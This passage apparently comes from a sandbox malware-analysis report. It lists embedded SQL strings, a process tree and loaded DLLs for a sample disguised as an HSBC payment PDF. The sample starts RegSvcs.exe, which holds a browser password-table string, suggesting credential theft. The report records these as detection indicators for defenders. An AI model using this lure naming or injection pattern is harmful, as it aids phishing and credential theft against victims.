              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT OR REPLACE INTO content_item_relations( src_content_item_id, target_content_item_id, rel) VALUES( :srcContentItemId, :targetContentItemId, :rel);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO resource_revisions( revision_id, rel_to_content_item, resource_type, media_type, locator, committed, hashType, hash, storageSize, width, height) VALUES( :revisionId, :relToContentItem, :resourceType, :mediaType, :locator_var, :committed_var, :hashType_var, :hash_var, :storageSize_var, :width_var, :height_var);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS branches ( content_item_id TEXT NOT NULL, content_item_revision_id TEXT NOT NULL, branch_name TEXT NOT NULL, app_id TEXT NOT NULL, is_transient INTEGER DEFAULT 0 NOT NULL, record_created TIMESTAMP NOT NULL, modified TIMESTAMP NOT NULL, download_state TEXT DEFAULT NULL, PRIMARY KEY (content_item_id, branch_name, app_id));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_resources ( content_item_revision_id TEXT NOT NULL, resource_revision_id TEXT NOT NULL, resource_id TEXT DEFAULT NULL, resource_cloud_etag TEXT DEFAULT NULL, resource_cloud_version_id TEXT DEFAULT NULL, resource_local_etag TEXT DEFAULT NULL, resource_local_version_id TEXT DEFAULT NULL, PRIMARY KEY (content_item_revision_id, resource_revision_id));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO device_mappings( device_mapping_id, content_item_id, collection_id, content_item_type, include_rel_types, include_depth, branch, TTL, Priority, app_info) VALUES( :deviceMappingId, :contentItemId, :collectionId, :contentItemType, :includeRelTypes, :includeDepth, :branch, :TTL, :priority, :appInfo);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO content_item_resources( content_item_revision_id, resource_revision_id) VALUES( :contentItemRevisionId, :resourceRevisionId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO branches ( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_items SET removed_from_server = :removedFromServer WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE branches SET modified = :modified WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT branches.content_item_id FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = :branch1 AND branches.content_item_id = :contentItemId AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = :branch2 AND branches.content_item_id = :contentItemId))));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS resource_revisions ( revision_id TEXT PRIMARY KEY NOT NULL, rel_to_content_item TEXT NOT NULL, resource_type TEXT NOT NULL, media_type TEXT NOT NULL, locator TEXT NOT NULL, committed INTEGER NOT NULL, hashType TEXT DEFAULT NULL, hash TEXT DEFAULT NULL, storageSize INTEGER DEFAULT 0, width INTEGER DEFAULT 0, height INTEGER DEFAULT 0);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: select count(*) from SQLITE_MASTER where type = "table";
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO content_item_revisions( content_item_revision_id, cloud_etag, updated, local_etag, request_id, content_name) VALUES( :contentIemRevisionId, :cloudEtag, :updated, :localEtag, :requestId, :contentName);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_revisions( content_item_revision_id TEXT PRIMARY KEY NOT NULL, cloud_etag TEXT DEFAULT NULL, cloud_version_id TEXT DEFAULT NULL, updated TIMESTAMP DEFAULT NULL, acl TEXT DEFAULT NULL, local_etag TEXT DEFAULT NULL, local_version_id TEXT DEFAULT NULL, request_id TEXT DEFAULT NULL, content_name TEXT DEFAULT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_items( creation_id TEXT PRIMARY KEY NOT NULL, asset_id TEXT DEFAULT NULL, type TEXT NOT NULL, content_item_type TEXT NOT NULL, created TEXT NOT NULL, removed_from_server INTEGER DEFAULT 0 NOT NULL, pending_local_delete INTEGER DEFAULT 0 NOT NULL, update_seq_num INTEGER DEFAULT 0 NOT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS sync_tokens ( content_item_id TEXT PRIMARY KEY NOT NULL, token TEXT DEFAULT NULL, last_sync_time TIMESTAMP DEFAULT NULL, device_mapping_id TEXT DEFAULT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE pending_requests SET request_status = :requestStatus, message = :message, status_code = :statusCode WHERE( pending_request_id = :pendingRequestId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT * FROM device_mappings WHERE( content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT OR REPLACE INTO branches ( content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, branch_name) SELECT content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, :targetBranchname from branches WHERE branch_name = :srcBranchname AND content_item_id = :contentItemId AND app_id = :appId;
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT branches.content_item_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) JOIN content_items ON( content_items.creation_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch1 AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id NOT IN ( SELECT branches.content_item_revision_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch2))));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_relations ( src_content_item_id TEXT NOT NULL, target_content_item_id TEXT NOT NULL, rel TEXT NOT NULL, PRIMARY KEY (src_content_item_id, target_content_item_id, rel));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO pending_requests( pending_request_id, request_type, content_item_id, context) VALUES( :pendingRequestId, :requestType, :contentItemId, :context);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT *, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = creation_id_local AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload, (SELECT 1 from branches where branch_name = 'conflict' AND content_item_id = creation_id_local) as is_conflicted, ( SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id and branches.content_item_id = creation_id_local) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base'))))) as is_sync_pending FROM ( SELECT content_item_relations.src_content_item_id, branches.download_state, branches.record_created, branches.modified, content_items.creation_id , content_items.creation_id as creation_id_local, branches.content_item_id, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_item_revisions SET local_etag = :localEtag, request_id = :requestId, updated = :updated WHERE( content_item_revision_id IN ( SELECT content_item_revision_id FROM branches WHERE( content_item_id = :contentItemId AND branch_name = :branchName ANDapp_id = :appId)));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType and content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE device_mappings SET unPinned = 1 WHERE(content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS pending_requests ( pending_request_id TEXT PRIMARY KEY NOT NULL, request_type TEXT NOT NULL, content_item_id TEXT DEFAULT NULL, context TEXT DEFAULT NULL, pending_request_created TIMESTAMP DEFAULT (strftime('%Y-%m-%dT%H:%M:%SZ', 'now', 'localtime')) NOT NULL, request_status TEXT DEFAULT "CREATED" NOT NULL, message TEXT DEFAULT NULL, status_code INTEGER DEFAULT -1 NOT NULL, device_mapping_id TEXT DEFAULT NULL, UNIQUE (content_item_id, request_type, request_status));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :assetId AND branches.branch_name = :branchName AND branches.app_id = :appId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT content_items.creation_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'current' AND branches.app_id = :appid) AND ((content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR (content_item_revisions.content_item_revision_id) NOT IN ( SELECT content_item_revisions.content_item_revision_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'base' AND branches.app_id = :appid))) AND content_items.creation_id NOT IN ( SELECT content_item_id FROM branches WHERE( branch_name = 'error'));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT creation_id FROM content_items WHERE asset_id = :assetId;
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT * FROM device_mappings WHERE( unPinned = 1);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted, (SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :collectionId AND branches.branch_name = :branchName AND branches.app_id = :appId)) as collection_cloud_etag FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN content_item_rel
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_updates ( seq_num INTEGER PRIMARY KEY NOT NULL, app_id TEXT NOT NULL, content_item_local_id TEXT NOT NULL, time TIMESTAMP NOT NULL, operation TEXT NOT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_items SET asset_id = :assetId WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS device_mappings ( device_mapping_id TEXT PRIMARY KEY NOT NULL, content_item_id TEXT NOT NULL, content_item_type TEXT NOT NULL, include_rel_types TEXT DEFAULT NULL, include_depth INTEGER DEFAULT 0 NOT NULL, branch TEXT DEFAULT NULL, device_mapping_created TIMESTAMP DEFAULT (strftime('%s', 'now')) NOT NULL, collection_id TEXT DEFAULT NULL, TTL INTEGER DEFAULT 0 NOT NULL, Priority INTEGER DEFAULT 0 NOT NULL, app_info TEXT NOT NULL, unPinned INTEGER DEFAULT 0 NOT NULL, UNIQUE (content_item_id, branch));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO resource_content( resource_content_id, resource_content) VALUES ( :resourceContentId, :resourceContent);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT *FROM pending_requests WHERE(content_item_id = :contentItemId);
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002835000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002844000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002865000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2642739426.000000000376D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002826000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 78%
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
